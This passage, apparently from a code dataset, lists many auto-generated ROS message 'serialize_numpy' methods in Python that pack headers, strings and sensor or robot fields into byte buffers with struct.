self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.base.header.seq, _x.base.header.stamp.secs, _x.base.header.stamp.nsecs))\n _x = self.base.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_5f.pack(_x.base.cell_width, _x.base.cell_height, _x.base.position.x, _x.base.position.y, _x.base.position.z))\n length = len(self.base.points)\n buff.write(_struct_I.pack(length))\n for val1 in self.base.points:\n _x = val1\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n length = len(self.base.intensity)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(self.base.intensity.tostring())\n buff.write(_struct_b.pack(self.base.cost))\n _x = self.base.label\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_2f.pack(_x.mean_height, _x.mean_intensity))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_B12d.pack(_x.visible, _x.x, _x.y, _x.z, _x.u, _x.v, _x.w, _x.phi, _x.theta, _x.psi, _x.p, _x.q, _x.r))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_b7d().pack(_x.decision, _x.distance, _x.oriX, _x.oriY, _x.oriZ, _x.placX, _x.placY, _x.placZ))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n buff.write(_get_struct_i().pack(self.numberOfTSPTurtles))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.cmd\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n 
buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.cat\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_I3f2d13fH().pack(_x.sample_count, _x.ekf_roll, _x.ekf_pitch, _x.ekf_yaw, _x.ekf_lat, _x.ekf_lon, _x.ekf_alt, _x.ekf_vN, _x.ekf_vE, _x.ekf_vD, _x.ekf_vX, _x.ekf_vY, _x.ekf_vZ, _x.rad_gyro_X, _x.rad_gyro_Y, _x.rad_gyro_Z, _x.angular_acc_X, _x.angular_acc_Y, _x.angular_acc_Z, _x.alt_DVL))\n _x = self.dvl_error_code\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))\n else:\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_B9f2i7f().pack(_x.flag_to_check, _x.imu_deg_gyro_X, _x.imu_deg_gyro_Y, _x.imu_deg_gyro_Z, _x.imu_mag_X, _x.imu_mag_Y, _x.imu_mag_Z, _x.imu_acc_X, _x.imu_acc_Y, _x.imu_acc_Z, _x.gps_lat, _x.gps_lon, _x.gps_alt, _x.gps_vN, _x.gps_vE, _x.gps_vD, _x.dvl_vX, _x.dvl_vY, _x.dvl_vZ))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_2I2d4fh2B.pack(_x.date, _x.time, _x.longitude_RTK, _x.latitude_RTK, _x.height_above_sea_RTK, _x.velocity_north, _x.velocity_east, _x.velocity_ground, _x.yaw, _x.position_flag, _x.yaw_flag))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_q6d().pack(_x.control.mode, _x.control.duty_cycle, _x.control.current, _x.control.brake, _x.control.speed, _x.control.position, _x.control.servo))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n 
buff.write(_struct_14id2i.pack(_x.lnid, _x.did, _x.blid, _x.flid, _x.bnid, _x.fnid, _x.jct, _x.blid2, _x.blid3, _x.blid4, _x.flid2, _x.flid3, _x.flid4, _x.clossid, _x.span, _x.lcnt, _x.lno))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_2I4d().pack(_x.h_min, _x.h_max, _x.s_min, _x.s_max, _x.v_min, _x.v_max))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_H2BiIbB4H2B3I().pack(_x.mask, _x.dynModel, _x.fixMode, _x.fixedAlt, _x.fixedAltVar, _x.minElev, _x.drLimit, _x.pDop, _x.tDop, _x.pAcc, _x.tAcc, _x.staticHoldThresh, _x.dgpsTimeOut, _x.reserved2, _x.reserved3, _x.reserved4))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n length = len(self.cnt)\n buff.write(_struct_I.pack(length))\n for val1 in self.cnt:\n _v7 = val1.header\n buff.write(_get_struct_I().pack(_v7.seq))\n _v8 = _v7.stamp\n _x = _v8\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v7.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_i().pack(val1.devadd))\n _v9 = val1.now\n _x = _v9\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n buff.write(_get_struct_I().pack(val1.encounter))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_B2i2B.pack(_x.partial_view, _x.resolution, _x.type, _x.use_simple_occlusion, _x.add_point_colors))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_2i16dih().pack(_x.Timestamp_sec, _x.Timestamp_nsec, _x.Roll, _x.Pitch, _x.Yaw, _x.Wx, _x.Wy, _x.Wz, _x.AcelX, _x.AcelY, _x.AcelZ, _x.VelN, _x.VelE, _x.VelZ, _x.GPSLong, _x.GPSLat, _x.GPSAlt, _x.Temp, _x.IMUTime, _x.BITStatus))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n 
buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_I().pack(self.robot_id.id))\n _x = self.robot_id.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_3I().pack(_x.agv_msg.header.seq, _x.agv_msg.header.stamp.secs, _x.agv_msg.header.stamp.nsecs))\n _x = self.agv_msg.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_I().pack(self.agv_msg.vehicle_id.id))\n _x = self.agv_msg.vehicle_id.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_21f().pack(_x.agv_msg.left_size, _x.agv_msg.right_size, _x.agv_msg.front_size, _x.agv_msg.rear_size, _x.agv_msg.min_height, _x.agv_msg.max_height, _x.agv_msg.payload, _x.agv_msg.max_pos_x_vel, _x.agv_msg.max_neg_x_vel, _x.agv_msg.max_pos_x_acc, _x.agv_msg.max_neg_x_acc, _x.agv_msg.max_pos_y_vel, _x.agv_msg.max_neg_y_vel, _x.agv_msg.max_pos_y_acc, _x.agv_msg.max_neg_y_acc, _x.agv_msg.max_pos_ang_vel, _x.agv_msg.max_neg_ang_vel, _x.agv_msg.velocity_control_sensitivity, _x.agv_msg.min_turning_radius, _x.agv_msg.batt_capacity, _x.agv_msg.batt_max_voltage))\n _x = self.agv_msg.vehicle_type\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.agv_msg.vendor\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.agv_msg.action_capability)\n buff.write(_struct_I.pack(length))\n for val1 in self.agv_msg.action_capability:\n _x = val1\n buff.write(_get_struct_2B().pack(_x.category, _x.action))\n length = len(val1.attributes)\n buff.write(_struct_I.pack(length))\n for val2 in val1.attributes:\n _x = val2.type\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = 
len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_3B4f2h3B().pack(_x.MatchMode, _x.MatchType, _x.TestMode, _x.pointA.x, _x.pointA.y, _x.pointB.x, _x.pointB.y, _x.angleA, _x.angleB, _x.idA, _x.idB, _x.kickforce))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self.group\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_2B().pack(_x.rand_start, _x.current_start))\n length = len(self.start_pos)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(self.start_pos.tostring())\n buff.write(_get_struct_B().pack(self.rand_target))\n length = len(self.target_pos)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(self.target_pos.tostring())\n _x = self\n buff.write(_get_struct_3Bb().pack(_x.execute, _x.wait, _x.ret_plan, _x.ret_fps))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n buff.write(_struct_B.pack(self.success))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def serialize_numpy(self, buff, numpy):\n try:\n length = len(self.pending)\n buff.write(_struct_I.pack(length))\n for val1 in self.pending:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.gateway_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v33 = val1.platform_info\n _x = _v33.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v33.rocon_uri\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v33.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v34 = _v33.icon\n _x = _v34.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v34.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v34.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n 
buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v33.version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_B().pack(val1.is_local_client))\n _x = val1.state\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.ip\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v35 = val1.conn_stats\n _x = _v35\n buff.write(_get_struct_Bq4fBbfb2f().pack(_x.gateway_available, _x.time_since_last_seen, _x.ping_latency_min, _x.ping_latency_max, _x.ping_latency_avg, _x.ping_latency_mdev, _x.network_info_available, _x.network_type, _x.wireless_bitrate, _x.wireless_link_quality, _x.wireless_signal_level, _x.wireless_noise_level))\n length = len(val1.rapps)\n buff.write(_struct_I.pack(length))\n for val2 in val1.rapps:\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.display_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.compatibility\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.status\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.implementations)\n buff.write(_struct_I.pack(length))\n for val3 in val2.implementations:\n length = len(val3)\n if python3 or type(val3) == unicode:\n val3 = val3.encode('utf-8')\n length = len(val3)\n buff.write(struct.pack('<I%ss'%length, length, val3))\n _x = val2.preferred\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v36 = val2.icon\n _x = _v36.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v36.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v36.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_interface)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_interface:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, 
length, _x))\n length = len(val2.public_parameters)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_parameters:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.available)\n buff.write(_struct_I.pack(length))\n for val1 in self.available:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.gateway_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v37 = val1.platform_info\n _x = _v37.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v37.rocon_uri\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v37.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v38 = _v37.icon\n _x = _v38.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v38.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v38.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v37.version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_B().pack(val1.is_local_client))\n _x = val1.state\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.ip\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v39 = val1.conn_stats\n _x = _v39\n buff.write(_get_struct_Bq4fBbfb2f().pack(_x.gateway_available, _x.time_since_last_seen, _x.ping_latency_min, _x.ping_latency_max, _x.ping_latency_avg, _x.ping_latency_mdev, _x.network_info_available, _x.network_type, _x.wireless_bitrate, _x.wireless_link_quality, _x.wireless_signal_level, _x.wireless_noise_level))\n length = len(val1.rapps)\n buff.write(_struct_I.pack(length))\n for val2 in val1.rapps:\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.display_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.description\n length = len(_x)\n if python3 or type(_x) == 
unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.compatibility\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.status\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.implementations)\n buff.write(_struct_I.pack(length))\n for val3 in val2.implementations:\n length = len(val3)\n if python3 or type(val3) == unicode:\n val3 = val3.encode('utf-8')\n length = len(val3)\n buff.write(struct.pack('<I%ss'%length, length, val3))\n _x = val2.preferred\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v40 = val2.icon\n _x = _v40.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v40.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v40.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_interface)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_interface:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_parameters)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_parameters:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.missing)\n buff.write(_struct_I.pack(length))\n for val1 in self.missing:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.gateway_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v41 = val1.platform_info\n _x = _v41.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v41.rocon_uri\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v41.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v42 = _v41.icon\n _x = _v42.resource_name\n length = len(_x)\n if python3 or type(_x) 
== unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v42.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v42.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v41.version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_B().pack(val1.is_local_client))\n _x = val1.state\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.ip\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v43 = val1.conn_stats\n _x = _v43\n buff.write(_get_struct_Bq4fBbfb2f().pack(_x.gateway_available, _x.time_since_last_seen, _x.ping_latency_min, 